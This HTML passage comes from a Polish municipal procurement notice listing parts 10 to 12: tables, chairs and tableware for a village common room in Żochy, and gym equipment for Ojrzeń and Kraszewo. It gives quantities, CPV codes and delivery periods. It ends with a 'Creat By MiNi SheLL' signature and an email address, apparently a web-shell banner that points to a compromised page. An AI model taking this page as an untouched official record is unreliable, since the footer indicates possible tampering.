<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakup wyposażenia do świetlicy wiejskiej w Żochach - zakup wyposażenia sali spotkań obejmujący: 
a.	Stoły na salę spotkań	szt.	7;
b.	Krzesła na salę spotkań	szt.	100..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.14.32.10-1, 39.11.21.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zakup wyposażenia do świetlicy wiejskiej w Żochach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakup wyposażenia do świetlicy wiejskiej w Żochach - zakup zastawy stołowej, obejmujący:
a.	Talerze głębokie obiadowe	szt.	108;
b.	Talerz płaski obiadowy	szt.	108;
c.	Talerzyk deserowy	szt.	108;
d.	Filiżanka	szt.	108;
e.	Spodek do filiżanki	szt.	108;
f.	Przyprawnik( 12 solniczek i 12 pieprzniczek)	szt.	24;
g.	Cukiernica	szt.	12;
h.	Miseczka mała (poj. ok. 200 ml)	szt.	12;
i.	Miseczka średnia (poj. ok. 350 ml)	szt.	12;
j.	Miseczka duża (poj. ok. 600ml)	szt.	8;
k.	Miska (poj. ok.3 l.)	szt.	10;
l.	Waza do zupy	szt.	10;
m.	Łyżeczka do herbaty	szt.	108;
n.	Łopatka do ciasta	szt.	10;
o.	Łyżka obiadowa	szt.	108;
p.	Nóż obiadowy	szt.	108;
q.	Widelczyk do ciasta	szt.	108;
r.	Widelec obiadowy	szt.	108;
s.	Dzbanek do napojów o pojemności ok. 1,3 l	szt.	12;
t.	Pucharek do lodów	szt.	108;
u.	Szklanka do napojów (poj. ok. 160 ml)	szt.	108;
v.	Patera do ciasta	szt.	5;
w.	Patera na owoce	szt.	5..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.12.00-9, 39.22.30.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zakup wyposażenia do siłowni wiejskiej w Ojrzeniu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakup wyposażenia do siłowni wiejskiej w Ojrzeniu, obejmujący:
a.	Atlas	szt.	1;
b.	Zestaw obciążeń żeliwny	szt.	1;
c.	Gryf prosty	szt.	1;
d.	Ławka ze stojakiem	szt.	1;
e.	Ławeczka do ćwiczeń mięśni brzucha	szt.	1;
f.	Stojak na obciążenia	szt.	1;
g.	Drążek do podciągania	szt.	1;
h.	Zestaw hantli 20 kg	szt.	1;
i.	Stepper	szt.	1;
j.	Rower stacjonarny	szt.	1;
k.	Rower eliptyczny	szt.	1;
l.	Bieżnia	szt.	2;
m.	Wioślarz	szt.	1;
n.	Mata gumowa pod sprzęt	szt.	10;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.44.23.00-8, 37.44.25.00-8, 37.44.22.00-8, 37.44.24.00-8, 37.44.29.00-8, 37.44.21.00-8, 37.44.13.00-4, 37.44.11.00-2, 37.44.14.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Zakup wyposażenia do siłowni wiejskiej w Kraszewie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakup wyposażenia do siłowni wiejskiej w Kraszewie, obejmujący:
a.	Atlas dwustanowiskowy	szt.	1;
b.	Zestaw obciążeń żeliwny	szt.	1;
c.	Ławka ze stojakiem	szt.	1;
d.	Stojak na obciążenia	szt.	1;
e.	Dip stacja ścienna	szt.	1;
f.	Zestaw hantli od 2,5 kg do 20 kg ze stojakiem do przechowywania.	szt.	1;
g.	Mata gumowa pod sprzęt	szt.	4..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.44.23.00-8, 37.44.25.00-8, 37.44.22.00-8, 37.44.24.00-8, 37.44.29.00-8, 37.44.21.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com